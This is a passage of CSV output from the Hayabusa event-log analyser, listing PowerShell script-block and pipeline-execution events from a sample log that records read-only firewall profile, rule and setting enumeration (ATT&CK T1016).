0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogBlocked'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogIgnored'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogIgnored'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.473 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallProfile): ""Get-NetFirewallProfile"" 
ParameterBinding(Get-NetFirewallProfile): name=""Name""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetFirewallRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecMainModeRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallProfile): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Domain"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Private"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Public"")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". 
See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.223 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.239 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""DisplayName""].Value",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) ; $this.PSBase.CimInstanceProperties[""DisplayName""].Value = $x ; $this.PSBase.CimInstanceProperties[""ElementName""].Value = $x",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profiles'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profiles'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]($this.PSBase.CimInstanceProperties['Direction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Direction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['Action'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Action'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]($this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]($this.PSBase.CimInstanceProperties['PrimaryStatus'].Value + 
0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PrimaryStatus'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""Status""].Value + "" ("" + ($this.PSBase.CimInstanceProperties[""StatusCode""].Value + 0) + "")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Microsoft.Windows.Firewall.Commands.Formatting.Formatter]::FormatEnforcementStatus($this.PSBase.CimInstanceProperties[""EnforcementStatus""].Value)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]($this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:12.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayName""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Description""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayGroup""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Group""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Enabled""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Direction""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Action""; value="""" ParameterBinding(Get-NetFirewallRule): name=""EdgeTraversalPolicy""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LooseSourceMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LocalOnlyMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Owner""; value="""" 
ParameterBinding(Get-NetFirewallRule): name=""PrimaryStatus""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Status""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSource""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSourceType""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallAddressFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallApplicationFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceTypeFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallPortFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallSecurityFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallServiceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallProfile""; value="""" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False"" TerminatingError(): ""The pipeline has been stopped.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:12.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallSetting,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]($this.PSBase.CimInstanceProperties['Exemptions'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Exemptions'].Value = 
[System.Uint32][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profile'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profile'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]($this.PSBase.CimInstanceProperties['CertValidationLevel'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['CertValidationLevel'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]($this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().Equals(""0"")) { ""NotConfigured""; } else { $x.Value }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = 0; } else { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = [uint32]$x; }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]($this.PSBase.CimInstanceProperties['KeyEncoding'].Value + 
